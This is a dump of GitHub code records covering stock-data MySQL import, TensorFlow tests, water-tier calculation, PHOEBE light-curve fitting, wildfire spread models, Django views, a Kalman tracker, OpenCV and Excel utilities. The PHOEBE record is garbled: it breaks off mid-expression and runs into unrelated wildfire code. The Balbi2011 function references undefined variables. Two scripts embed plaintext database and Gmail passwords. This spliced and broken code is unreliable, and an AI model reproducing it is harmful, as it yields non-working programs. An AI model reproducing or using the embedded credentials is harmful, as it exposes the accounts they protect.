{"seq_id":"34753262910","text":"#coding:gbk\nimport json\nimport pymysql\nconn = pymysql.connect(\n    host = 'localhost',#MySQL server address\n    port = 3306,#port number\n    user = 'root',#username\n    passwd = '19980729',#password\n    db = 'users',#database name\n    charset = 'utf8',#connection encoding, set as needed\n    )\ncur = conn.cursor()#create and return a cursor\nsql = \"CREATE TABLE stocktestforus (mingcheng VARCHAR(100),zuixinjia VARCHAR(100),zhangdiefu VARCHAR(100),zhangdiee VARCHAR(100),zuigao VARCHAR(100),zuidi VARCHAR(100) ,jinkai VARCHAR(100),zuoshou VARCHAR(100),zongshizhi VARCHAR(100),shiyinglv VARCHAR(100));\"\ncur.execute(sql)\ntemp =[]\nx=0 \nwith open('us.json','r') as file:\n    str = file.read()\n    data = json.loads(str)\nfor num in range(len(data)):\n    stock = data[num]\n    for key in stock:\n        if stock[key]=='-':\n            temp.append(stock['序号'])\n            break\nfor num in temp:\n    for i in range(len(data)-10):\n        if(data[i]['序号'])==num:\n            x=x+1\n            del data[i]\nfor da in data:\n\tmingcheng=da['名称']\n\tzuixinjia=da['最新价(美元)']\n\tzhangdiefu=da['涨跌幅']\n\tzhangdiee=da['涨跌额']\n\tzuigao=da['最高']\n\tzuidi=da['最低']\n\tjinkai=da['开盘价']\n\tzuoshou=da['昨收']\n\tzongshizhi = da['总市值(美元)']\n\tshiyinglv = da['市盈率']\n\tsql_insert =(\"insert into stocktestforus (mingcheng,zuixinjia,zhangdiefu,zhangdiee,zuigao,zuidi,jinkai,zuoshou,zongshizhi,shiyinglv) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);\")\n\tcur.execute(sql_insert,(mingcheng,zuixinjia,zhangdiefu,zhangdiee,zuigao,zuidi,jinkai,zuoshou,zongshizhi,shiyinglv))\nconn.commit()\nconn.close()\n\n\t\n\t\n","repo_name":"yxyzds/NEU-STOCK","sub_path":"数据库连接脚本/tomysqlforus.py","file_name":"tomysqlforus.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"16932628855","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward as ed\nimport tensorflow as tf\n\nfrom edward.models import Normal\n\n\nclass test_random_variable_session_class(tf.test.TestCase):\n\n  def test_eval(self):\n    with self.test_session() as sess:\n      
x = Normal(0.0, 0.1)\n      x_ph = tf.placeholder(tf.float32, [])\n      y = Normal(x_ph, 0.1)\n      self.assertLess(x.eval(), 5.0)\n      self.assertLess(x.eval(sess), 5.0)\n      self.assertLess(x.eval(feed_dict={x_ph: 100.0}), 5.0)\n      self.assertGreater(y.eval(feed_dict={x_ph: 100.0}), 5.0)\n      self.assertGreater(y.eval(sess, feed_dict={x_ph: 100.0}), 5.0)\n      self.assertRaises(tf.errors.InvalidArgumentError, y.eval)\n      self.assertRaises(tf.errors.InvalidArgumentError, y.eval, sess)\n\n  def test_run(self):\n    with self.test_session() as sess:\n      x = Normal(0.0, 0.1)\n      x_ph = tf.placeholder(tf.float32, [])\n      y = Normal(x_ph, 0.1)\n      self.assertLess(sess.run(x), 5.0)\n      self.assertLess(sess.run(x, feed_dict={x_ph: 100.0}), 5.0)\n      self.assertGreater(sess.run(y, feed_dict={x_ph: 100.0}), 5.0)\n      self.assertRaises(tf.errors.InvalidArgumentError, sess.run, y)\n\nif __name__ == '__main__':\n  ed.set_seed(82341)\n  tf.test.main()\n","repo_name":"blei-lab/edward","sub_path":"tests/models/random_variable_session_test.py","file_name":"random_variable_session_test.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":4805,"dataset":"github-code","pt":"61"}
{"seq_id":"20786252919","text":"import os\nimport math\n\n\n# TODO: do this for the user with THEIR county/state\n#GET the county lot size ranges, put them in a list\n#GET the county TIER rate ranges\n#THEN use the logic down below with the COUNTY lot/tier ranges\n\n#Determine lot size tier\ndef determine_lot_size(lot_size):\n\n    tier1 = \"Lot Size Tier 1\"\n    tier2 = \"Lot Size Tier 2\" \n    tier3 = \"Lot Size Tier 3\"\n    tier4 = \"Lot Size Tier 4\" \n    tier5 = \"Lot Size Tier 5\"\n\n    # ranges are made contiguous so no lot size falls through the cracks\n    if lot_size < 7500: \n        print(lot_size)\n        return tier1\n    elif lot_size in range(7500, 11000):\n        print(lot_size)\n        return tier2\n    elif lot_size in range(11000, 17500): \n        print(lot_size)\n        return tier3\n    elif lot_size in range(17500, 43560): \n        print(lot_size) \n        return tier4\n    elif lot_size >= 43560: \n        print(lot_size)\n        return tier5\n    else: \n        print(\"waiting for other shit\")\n\n\ndef determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range):\n    if HCF <= 8:  # tier 1 covers everything below the tier 2 range\n        print(\"Tier 1 water usage\")\n    elif HCF in tier2_range:\n        print(\"Tier 2 water Usage\")\n    elif HCF in tier3_range:\n        print(\"Tier 3 water Usage\")\n    elif HCF in tier4_range: \n        print(\"Tier 4 Water usage\")\n    else:\n        print(\"Need HCF\")\n\n    print(lot_tier)\n\n\ndef determine_HCF(lot_tier, HCF):\n\n    #Default tier ranges\n    tier2_range = range(9, 17)\n    tier3_range = range(15, 35)\n    tier4_range = range(26, 44)\n\n    if lot_tier == \"Lot Size Tier 1\":\n        determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n\n    elif lot_tier == \"Lot Size Tier 2\":\n        tier2_range = range(9, 20)\n        tier3_range = range(18, 44)\n        tier4_range = range(35, 44)\n        determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range) \n\n    elif lot_tier == \"Lot Size Tier 3\":\n        tier2_range = range(9, 33)\n        tier3_range = range(26, 83)\n        tier4_range = range(59, 83)\n        determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n\n    elif lot_tier == \"Lot Size Tier 4\":\n        tier2_range = range(9, 39)\n        tier3_range = range(30, 101)\n        tier4_range = range(71, 101)\n        determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n\n    elif lot_tier == \"Lot Size Tier 5\":\n        tier2_range = range(9, 39)\n        tier3_range = range(30, 101)\n        tier4_range = range(71, 101)\n        determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n    else:\n        print(\"NO Lot tier inputted\")\n\nlot_size = input(\"Enter lot size:\")\nmy_HCF = input(\"Enter HCF:\") \nlot_size = int(lot_size) \nmy_HCF = 
int(my_HCF) \nlot_tier = determine_lot_size(lot_size) \ndetermine_HCF(lot_tier, my_HCF)\n\n\n\n\n\n","repo_name":"shaysingh818/Saya-Life","sub_path":"api_wrapper/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36476000715","text":"# Fitting Phoebe with emcee\n# A. Phriksee\n# Ver. 1.0, 14/05/2020\n \nimport os\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\n# Import Extension\nimport sys\nimport numpy as np\nimport emcee\nimport time\nfrom schwimmbad import MPIPool\nimport corner\n\n# Try to force the PHOEBE to run with single core in each value\ntemp_environ = dict(os.environ)\ndel os.environ['PMI_SIZE']\nimport phoebe\nos.environ.clear()\nos.environ.update(temp_environ)\n\n# Input data\ndata = np.loadtxt(\"mock_data.dat\")\nJD = data[:, 0]\nflux = data[:, 1]\nerr_flux = data[:, 2]\nsigma2 = err_flux**2.0\n\n# Setting BC\npos_lim_min = np.array([0.30, 0.40, 25000.0, 10000.0])\npos_lim_max = np.array([0.60, 0.50, 45000.0, 20000.0])\n\n# Setting emcee\nndim = len(pos_lim_min)\nnwalkers = 10 * ndim\nburnin = 500\n\n# Set the initial binary model\nb = phoebe.default_binary()\nb.filter()\nb.add_dataset('lc', times=JD, fluxes=flux, dataset='lc01')\nb.set_value('ld_mode', component='primary', dataset='lc01', value='manual')\nb.set_value('ld_mode', component='secondary', dataset='lc01', value='manual')\nb.set_value('ld_func', component='primary', dataset='lc01', value='logarithmic')\nb.set_value('ld_func', component='secondary', dataset='lc01', value='logarithmic')\nb.set_value_all('ld_mode_bol', value='manual')\nb.set_value('atm@primary@phoebe01@phoebe@compute', value='blackbody')\nb.set_value('atm@secondary@phoebe01@phoebe@compute', value='blackbody')\n\n# Set model and create light curve\ndef LC_sim(params_fit):\n\t(r1, r2, T1, T2) = params_fit\n\tb_model = b\n\tb_model.set_value('requiv', component='primary', value=r1)\n\tb_model.set_value('requiv', component='secondary', value=r2)\n\tb_model.set_value('teff', component='primary', value = T1)\n\tb_model.set_value('teff', component='secondary', value = T2)\n\t\n\t# Compute a model\n\tb_model.run_compute()\n\t\n\tlc_model = b_model.get_value('fluxes@lc@model')\n\tdel b_model\n\treturn lc_model\n\n# Set BC for the prior parameters\ndef lnprior(theta):\n if ((pos_lim_min 0:\n lU = RU\n\n \n R = 0.1 # first guess in iteration\n Rnew = 0\n maxEps = 0.001\n N = 100\n step = 1\n stopcondition = True\n \n flag = 1\n error = 0;\n \n # Packing ratio\n Beta = lsigma / (lh * lrhov)\n #Leaf Area ratio just before eq. 13 S is the total fuel surface area per horizontal area unit of fuel bed and denotes the double of the leaf area index (LAI)\n S = ls * Beta * lh\n #Ignition energy (J/kg) # eq. 9\n q = lCp * (lTi - lTa) + lm * (lDeltah + lCp * (Tvap - lTa))\n # scaling factor eq. 17\n ar = min(S / (2 * math.pi), 1.)\n # Radiative factor # eq. 16\n A = ar * ((lChi0 * lDeltaH) / (4 * q))\n # coefficient p required for T derived from expression between C7 and C8 \n p = (2 / lr00) / ltau0\n \n while stopcondition:\n\n # Radiant fractor eq. C7 \n Chi = lChi0 / (1 + p * ((R * ltau0 * math.cos(lalpha)) / (2 * ls)))\n # Mean Flame Temperature eq. B11\n T = lTa + lDeltaH * ((1 - Chi) / (Cpa * (st + 1)))\n # reference vertical velocity eq. 
B9\n u0 = 2 * (st + 1) / ltau0 * T / lTa * lrhov / lrhoa * min(S, 2 * math.pi)\n # flame angle\n gamma = math.atan(math.tan(lalpha) + (lU / u0))\n #Flame Height\n H = (u0 ** 2) / (lg * (T / lTa - 1.))\n \n Rb = min((S / math.pi), 1.) * ((B * (T ** 4)) / (Beta * lrhov * q))\n Rc1 = ls * (lDeltaH /(q*ltau0)) * min(lh, (2*math.pi)/(ls*Beta));\n \n Rc2 = (lh/(2*lh+H)) * math.tan(lalpha) + ( (lU*math.exp(-K1*pow(Beta,0.5)*R)) / u0);\n \n Rc = Rc1*Rc2 # eq. 27\n\n Rr = A*R*((1+math.sin(gamma)-math.cos(gamma))/( 1+ ( (R*math.cos(gamma)) / (ls*lr00) )) )# eq. 15\n\n Rnew = Rb+Rc+Rr\n \n error = R-Rnew\n\n R = Rnew\n if (step > N):\n flag=0\n break\n step=step+1\n\t\t\t\n stopcondition = (abs(error) > maxEps);\n\t\n if (flag != 1): \n if print_calculus :\n print(f\"no convergence in {N} steps for Balbi, error is {error}, returning ROS \", Z)\n else:\n print(\".\", end=\"\")\n \n return {\"ROS_mps\":Rnew, \"FllH_m\":H}\n\n\ndef Balbi2011(Z, print_calculus = False):\n \n # Fuel Characteristic Parameters\n lDeltaH = Z.H_Jkg\n lh = Z.fd_m\n lrhov = Z.fuelDens_kgm3\n st = Z.st_r\n ltau0 = Z.Tau0_spm\n lCp = Z.Cpf_JkgK\n \n # Model Parameters\n lDeltah = Z.hEvap_Jkg\n Tvap = Z.Tvap_degK\n Cpa = Z.Cpa_JkgK\n lTi = Z.Ti_degK\n\n # Model fitted parameters\n K1 = Z.K1_spm\n lr00 = Z.r00\n lChi0 = Z.X0\n \n # Constants\n B = Z.B\n lg = Z.g\n \n # Fuel State parameter\n ls = Z.SAV1h_minv\n lsigma = Z.fl1h_kgm2\n lm = Z.mdOnDry1h_r\n \n # Environment parameters\n lTa = Z.Ta_degK\n lalpha = Z.slope_rad\n RU = Z.wind_mps\n lrhoa = Z.airDens_kgm3\n \n \n \n lRhod = Z.fuelDens_kgm3\n lRhol = valueOf[\"Rhol\"]\n lMd = valueOf[\"Md\"]\n lMl = valueOf[\"Ml\"]\n lsd = valueOf[\"sd\"]\n lsl = valueOf[\"sl\"]\n le = valueOf[\"e\"]\n lSigmad = valueOf[\"Sigmad\"]\n lSigmal = valueOf[\"Sigmal\"]\n lstoch = valueOf[\"stoch\"]\n lRhoA = valueOf[\"RhoA\"]\n lTa = valueOf[\"Ta\"]\n lTau0 = valueOf[\"Tau0\"]\n lDeltah = valueOf[\"Deltah\"]\n lDeltaH = valueOf[\"DeltaH\"]\n lCp = valueOf[\"Cp\"]\n lTi = valueOf[\"Ti\"]\n lX0 = valueOf[\"X0\"]\n lr00 = valueOf[\"r00\"]\n lai = valueOf[\"Blai\"]\n \n cosCurv = 1\n \n if le <= 0:\n return 0\n \n Betad = lSigmad / (le * lRhod)\n Betal = lSigmal / (le * lRhol)\n Sd = lsd * le * Betad\n Sl = lsl * le * Betal\n nu = min((Sd) / lai, 1)\n normal_wind = adjustementWind * valueOf[\"normalWind\"]\n B = 5.670373E-8\n a = lDeltah / (lCp * (lTi - lTa))\n r0 = lsd * lr00\n A0 = (lX0 * lDeltaH) / (4 * lCp * (lTi - lTa))\n xsi = ((lMl - lMd) * ((Sd / Sl) * (lDeltah / lDeltaH))) # cf. Santoni et al., 2011\n A = cosCurv * (nu * A0 / (1 + a * lMd)) * (1 - xsi)\n T = lTa + (lDeltaH * (1 - lX0) * (1 - xsi)) / ((lstoch + 1) * Cpa)\n R00 = (B * T ** 4) / (lCp * (lTi - lTa))\n R0 = (le / lSigmad) * (R00) / (1 + a * lMd) * Sd / (Sd + Sl) * Sd / (Sd + Sl)\n u00 = (2 * lai * (lstoch + 1) * T * lRhod) / (lRhoA * lTa * lTau0)\n u0 = nu * u00\n \n tanGamma = adjustementSlope * valueOf[\"slope\"] + (normal_wind / u0)\n gamma = atan(tanGamma)\n \n if gamma > 0:\n geomFactor = r0 / cos(gamma) * (1 + sin(gamma) - cos(gamma))\n Rt = R0 + A * geomFactor - r0 / cos(gamma)\n R = 0.5 * (Rt + sqrt(Rt * Rt + 4. 
* r0 * R0 / cos(gamma)))\n else:\n R = R0\n \n return R\n\n ","repo_name":"forefireAPI/wildfire_ROS_models","sub_path":"wildfireROS/Balbi2020.py","file_name":"Balbi2020.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72013881795","text":"from django.shortcuts import render\n\n# Create your views here.\n# myapp/views.py\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .models import noisedata\nfrom .models import noiseLocation\nfrom .serializers import noiseDataSerializer\nfrom .serializers import noiseLocationSerializer\n\n@api_view(['GET', 'POST'])\ndef noiseData_list(request):\n if request.method == 'GET':\n noise = noisedata.objects.all()\n serializer = noiseDataSerializer(noise, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = noiseDataSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef noise_detail(request, pk):\n try:\n noise = noisedata.objects.get(pk=pk)\n except noisedata.DoesNotExist:\n return Response(status=404)\n\n if request.method == 'GET':\n serializer = noiseDataSerializer(noise)\n return Response(serializer.data)\n\n elif request.method == 'PUT':\n serializer = noiseDataSerializer(noise, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n noise.delete()\n return Response(status=204)\n \n\n@api_view(['GET', 'POST'])\ndef noiselocations_list(request):\n if request.method == 'GET':\n locations = noiseLocation.objects.all()\n serializer = noiseLocationSerializer(locations, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = noiseLocationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef noiselocations_detail(request, pk):\n try:\n locations = noiseLocation.objects.get(pk=pk)\n except noiseLocation.DoesNotExist:\n return Response(status=404)\n\n if request.method == 'GET':\n serializer = noiseLocationSerializer(locations)\n return Response(serializer.data)\n\n elif request.method == 'PUT':\n serializer = noiseLocationSerializer(locations, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n locations.delete()\n return Response(status=204)","repo_name":"Khadar-kr/MDA-Project-New-Zealand","sub_path":"Backend/noiseData/noiseDataRestApi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71192567873","text":"import cv2\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy.spatial import distance_matrix\nnp.set_printoptions(precision=3)\n\nclass EKFTracker:\n def __init__(self, x, y, id, max_decay_count) -> None:\n\n dt = 1/40\n self.x = np.array([x, 0, 0, y, 0, 0])\n self.F = np.array([[1, dt, 0.5*dt**2, 0, 0, 0],\n [0, 1, dt, 0, 0, 0],\n [0, 0, 1, 0, 0, 0],\n [0, 0, 0, 1, dt, 
0.5*dt**2],\n                           [0, 0, 0, 0, 1, dt],\n                           [0, 0, 0, 0, 0, 1]])\n        \n        self.H = np.array([[1, 0, 0, 0, 0, 0],\n                           [0, 0, 0, 1, 0, 0]])\n        self.dt = dt\n\n        self.P = np.eye(self.x.shape[0])\n        self.Q = np.array([[0.05, 0, 0, 0, 0, 0],\n                           [0, 0.03, 0, 0, 0, 0],\n                           [0, 0, 0.07, 0, 0, 0],\n                           [0, 0, 0, 0.05, 0, 0],\n                           [0, 0, 0, 0, 0.03, 0],\n                           [0, 0, 0, 0, 0, 0.07]])\n        # self.Q = np.array([[0, 0, 0, 0, 0, 0],\n        #                    [0, 0, 0, 0, 0, 0],\n        #                    [0, 0, 0, 0, 0, 0],\n        #                    [0, 0, 0, 0, 0, 0],\n        #                    [0, 0, 0, 0, 0, 0],\n        #                    [0, 0, 0, 0, 0, 0]])\n        \n        self.R = np.array([[0.02, 0],\n                           [0, 0.02]])\n        self.id = id\n        self.age = 0\n        self.max_decay_count = max_decay_count\n    \n    def predict(self):\n        self.x = self.F @ self.x\n        self.P = self.F @ self.P @ self.F.T + self.Q\n        self.age += 1\n        validity = True\n        if self.age > self.max_decay_count:\n            validity = False\n        return self.x, validity\n\n    def update(self, z):\n        S = self.H @ self.P @ self.H.T + self.R\n        K = self.P @ self.H.T @ np.linalg.inv(S)\n        y = z - self.H @ self.x\n        # print(f'Prior P is -> \\n{self.P}')\n        # print(f'H @ P @ H.T is -> \\n{S}')\n        # print(f'K is -> \\n{K}')\n        # print(f'y is -> \\n{y}')\n        self.x = self.x + K @ y\n        self.P = self.P - K @ self.H @ self.P\n        # print(f'Posterior x is -> \\n{self.x}')\n        # print(f'Posterior P is -> \\n{self.P}')\n        self.age = 0\n        return self.x\n\n\nclass Trackers:\n    def __init__(self, max_decay_count) -> None:\n        self.trackers = {}\n        self.id = 0\n        self.predicted_states = {}\n        self.updated_states = {}\n        self.max_decay_count = max_decay_count\n\n    def add_tracker(self, x, y):\n        self.trackers[self.id] = EKFTracker(x, y, self.id, self.max_decay_count)\n        self.predicted_states[self.id] = np.array([x,y])\n        self.updated_states[self.id] = np.array([x,y])\n        self.id += 1\n\n    def associate_and_update(self, z_list):\n        predicted_positions_list = [self.predicted_states[key] for key in sorted(self.predicted_states.keys())]\n        cost_matrix = distance_matrix(predicted_positions_list, z_list)\n        row_indices, col_indices = linear_sum_assignment(cost_matrix)\n        for row, col in zip(row_indices, col_indices):\n            tracker_id = sorted(self.predicted_states.keys())[row]\n            z = z_list[col]\n            state = self.trackers[tracker_id].update(z)\n            self.updated_states[tracker_id] = np.array([state[0], state[3]])\n        if len(col_indices) < len(z_list):\n            for col in range(len(z_list)):\n                if col not in col_indices:\n                    x, y = z_list[col]\n                    self.add_tracker(x, y)\n\n    def predict(self):\n        delete_ids = []\n        for tracker_id in self.trackers:\n            state, validity = self.trackers[tracker_id].predict()\n            if not validity:\n                delete_ids.append(tracker_id)\n            else:\n                self.predicted_states[tracker_id] = np.array([state[0], state[3]])\n        for tracker_id in delete_ids:\n            del self.trackers[tracker_id]\n            del self.predicted_states[tracker_id]\n            del self.updated_states[tracker_id]\n\n    def draw_trackers(self, frame):\n        for tracker_id in self.trackers:\n            predicted_state = self.predicted_states[tracker_id].astype(int)\n            radius = 20\n            cv2.circle(frame, predicted_state, radius, (0, 255, 0), 2) # Prediction is green\n            updated_state = self.updated_states[tracker_id].astype(int)\n            cv2.circle(frame, updated_state, radius, (255, 0, 0), 2) # Update is blue\n            # Add tracker id using putText\n            cv2.putText(frame, str(tracker_id), (int(updated_state[0] + 10), int(updated_state[1] + 10)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n            if 
np.array_equal(predicted_state, updated_state):\n                continue\n            vec = predicted_state - updated_state\n            # scale before casting; casting the unit vector to int first truncated it to zeros\n            norm_vec = (vec / np.linalg.norm(vec) * 20).astype(int)\n            norm_vec = updated_state + norm_vec\n            cv2.arrowedLine(frame, updated_state, norm_vec, (0, 0, 255), 2, tipLength=0.5)\n        return frame\n\n    def get_tracker(self, tracker_id):\n        return self.trackers[tracker_id]\n\n    def update_and_predict(self, z_list):\n        curr_states = None\n        if z_list != []:\n            self.associate_and_update(z_list)\n            curr_states = self.updated_states\n        else:\n            curr_states = self.predicted_states\n        self.predict()\n        return curr_states\n\n","repo_name":"saching13/buoy-tracker","sub_path":"buoy_tracker/buoy_tracker/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"71642003395","text":"import cv2\nimport numpy as np\nvideo = cv2.VideoCapture('./sentdexVideos/Intro and loading Images - OpenCV with Python for Image and Video Analysis 1.mp4')\n# Create the background/foreground extractor object\nfgbg = cv2.createBackgroundSubtractorMOG2()\n\nwhile True:\n    _, frame = video.read()\n    # Apply the extractor on the video frame\n    mask = fgbg.apply(frame)\n    # Use the extractor frame in order to obtain the feed\n    # Which is actively moving/ changing that will be the foreground\n    # You can also use the not operator to indicate images in the background\n    foregroundFrame = cv2.bitwise_and(frame, frame, mask = mask)\n    backgroundFrame = cv2.bitwise_and(frame, frame, mask = cv2.bitwise_not(mask))\n    cv2.imshow('Video', frame)\n    # cv2.imshow('FGBG Mask', mask)\n    # cv2.imshow('Foreground Frame', foregroundFrame)\n    # cv2.imshow('Background Frame', backgroundFrame)\n    k = cv2.waitKey()\n    if k == 27 or not _:\n        break\n\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"ElisonSherton/OpenCV-Basic-Programs","sub_path":"bgReduction.py","file_name":"bgReduction.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"39196717957","text":"import smtplib\n\ndef textoformatado(string):\n    '''\n    -> Receives a string and returns it without accents.\n    Param string = String to clean.\n    return: NewString+\"\\n\"\n    '''\n    string = (string[1:]).strip()\n    textinho = ''\n    invalidos = ['ã', 'á', 'â', 'à', 'é', 'ê', 'í', 'ó', 'ô', 'ú', 'ç', 'ñ']\n    aceitos = ['a', 'a', 'a', 'a', 'eh', 'e', 'i', 'o', 'o', 'u', 'c', 'n']\n    for i in string:\n        if 127 > ord(i) > 31:\n            textinho += i\n        else:\n            for a in range(len(invalidos)):\n                if i == invalidos[a]:\n                    textinho += aceitos[a]\n    return textinho + '\\n'\n\ndef enviar(email, tasks, telegram = 'n'):\n    '''\n    -> Receives an email address and tasks, then sends the tasks to the desired email.\n    Param email = destination email; if it has no @, @gmail.com is appended.\n    Param tasks = Tasks in a list.\n    No return.\n    '''\n    if '@' not in email:\n        email += '@gmail.com'\n    if type(tasks) == list:\n        tasks = ''.join([textoformatado(x) for x in tasks])\n    usuario = 'todotxtcin@gmail.com' \n    senha = 'Python123'\n\n    de = usuario \n    para = ['todotxtcin@gmail.com', email] \n    assunto = 'TODO.TXT Tasks' \n    tarefas = tasks\n\n    texto = \"\"\"\\ \n    De: %s \n    Para: %s \n    Assunto: %s\n\n%s\n    \"\"\" % (de, \", \".join(para), assunto, tarefas)\n    try:\n        server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n        server.ehlo()\n        server.login(usuario, senha)\n        server.sendmail(de, para, texto)\n        server.close()\n        \n        if telegram == 'n': \n            print 
('Email Enviado!')\n        else:\n            return 'Email Enviado!'\n    except: \n        if telegram == 'n':\n            print ('Alguma coisa deu errado...')\n        else:\n            return 'Alguma coisa deu errado...'\n","repo_name":"JDaniloC/Projeto-IF968-2019","sub_path":"utils/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"71509144513","text":"from setuptools import setup, find_packages\n\n\ndef read(fname):\n    with open(fname) as f:\n        return f.read()\n\n\nsetup(\n    name=\"pyEthioNews\",\n    version=\"1.0.3\",\n    url=\"https://github.com/wizkiye/pyEthioNewsApi\",\n    license=\"MIT\",\n    author=\"https://github.com/wizkiye\",\n    author_email=\"wizkiye@gmail.com\",\n    description=\"Ethiopian News Scraper\",\n    long_description=read(\"README.md\"),\n    long_description_content_type=\"text/markdown\",\n    install_requires=[\n        \"httpx\",\n        \"bs4\",\n    ],\n    packages=find_packages(),\n)\n","repo_name":"wizkiye/pyEthioNewsApi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"24237393921","text":"import os\nimport json\nimport argparse\nfrom openpyxl import load_workbook\n\nclass WorkSheetNotAvailableError(Exception):\n\n    def __init__(self, wb):\n        self.message = 'Worksheet is not available. Available worksheets are \\n {}' \\\n            .format('\\n'.join(wb.get_sheet_names()))\n        super().__init__(self.message)\n    \n\ndef must_have(config):\n    '''wrapper to verify the config json file'''\n    def _wrapper(key):\n        if key not in config:\n            raise ValueError('{} is not provided in config file'.format(key))\n        else:\n            return True\n    return _wrapper\n    \nclass ExcelExtractor:\n\n    @classmethod\n    def create_from_cli(cls):\n        config = cls._load_args_from_cli()\n        self = cls(config)\n        \n        return self\n\n    def __init__(self, config):\n        self.config = config\n        # get the instance of workbook file\n        absolute_path = self.config.get('EXCEL_CONFIG_FILE')\n        if not absolute_path or not os.path.exists(absolute_path):\n            raise ValueError('Please pass a valid excel file.')\n        # now parse the json file\n        self._json_config = json.loads(open(absolute_path).read())\n        \n        self.requires = must_have(self._json_config)\n        \n        self._wb = self.requires('filename') and \\\n            load_workbook(os.path.expanduser(self._json_config['filename']), data_only=True)\n\n        worksheet_name = self.requires('worksheet') and self._json_config['worksheet']\n        if worksheet_name not in self._wb.get_sheet_names():\n            raise WorkSheetNotAvailableError(self._wb)\n        self._worksheet = self._wb[worksheet_name]\n        \n        \n    @classmethod\n    def _load_args_from_cli(cls):\n        config = {}\n        for key, val in vars(cls._get_args_cli()).items():\n            if val:\n                config['EXCEL_{}'.format(key.upper())] = val\n        return config\n        \n\n    @classmethod\n    def _get_args_cli(cls):\n        parser = argparse.ArgumentParser(\n            description='Excel Sheet Extractor'\n        )\n\n        parser.add_argument(\n            '-c', '--configfile',\n            action='store',\n            type=str,\n            required=True,\n            dest='config_file',\n            help='Absolute Path to config file'\n        )\n        parser.add_argument(\n            '-o', '--outputfile',\n            action='store',\n            type=str,\n            required=True,\n            dest='output_file',\n            help='Absolute Path to output file'\n        )\n        return parser.parse_args()\n\n\n    def get_rows(self):\n        # generator that yields the values of each row for the configured columns\n        start_column = self.requires('start_column') and self._json_config['start_column']\n        
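# Editor note (inferred from the config keys used here): bounds come from the JSON config as Excel-style column letters and 1-based row numbers; cells outside the row range are skipped below.\n        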
end_column = self.requires('end_column') and self._json_config['end_column']\n        \n        start_row = self.requires('start_row') and self._json_config['start_row']\n        end_row = self.requires('end_row') and self._json_config['end_row']\n\n        #column_range = set(map(chr, range(ord(start_column), ord(end_column) + 1)))\n        row_range = set(range(int(start_row), int(end_row) + 1))\n\n        data_frame = self._worksheet[start_column: end_column]\n        # the worksheet slice returns tuples of cells;\n        # convert them to lists so pop(0) works below\n        data_frame = [[cell for cell in w] for w in data_frame]\n\n        while all(len(col) > 0 for col in data_frame):\n            # the length of every column must be non zero\n            _result = []\n            for r in data_frame:\n                _cell = r.pop(0)\n                if _cell.row not in row_range:\n                    continue\n                _result.append((_cell.value, _cell.column))\n            if _result:\n                yield _result\n        \n\n    def _format_to_dict_list(self):\n        #get the input format\n        input_format = self.requires('input') and self._json_config['input']\n        output_format = self.requires('output') and self._json_config['output']\n        if 'format' in self._json_config:\n            global_format = self._json_config['format']\n        _result = []\n        for row in self.get_rows():\n            _format = {}\n            _input = {}\n            _output = {}\n            for val, col in row:\n                if self._json_config.get('format') and col in global_format:\n                    _format[global_format[col]] = val\n                if col in input_format:\n                    _input[input_format[col]] = val\n                if col in output_format:\n                    _output[output_format[col]] = val\n            _result.append({'input': _input, 'output': _output, 'chunk': _format})\n        return _result\n    \n    def to_json(self):\n        if not self.config['EXCEL_OUTPUT_FILE']:\n            raise ValueError('Invalid output file')\n        file_name = self.config['EXCEL_OUTPUT_FILE']\n        result = self._format_to_dict_list()\n        with open(file_name, mode='w') as file:\n            file.write(json.dumps(result))\n\n\nif __name__ == '__main__':\n    e = ExcelExtractor.create_from_cli()\n    e.to_json()\n 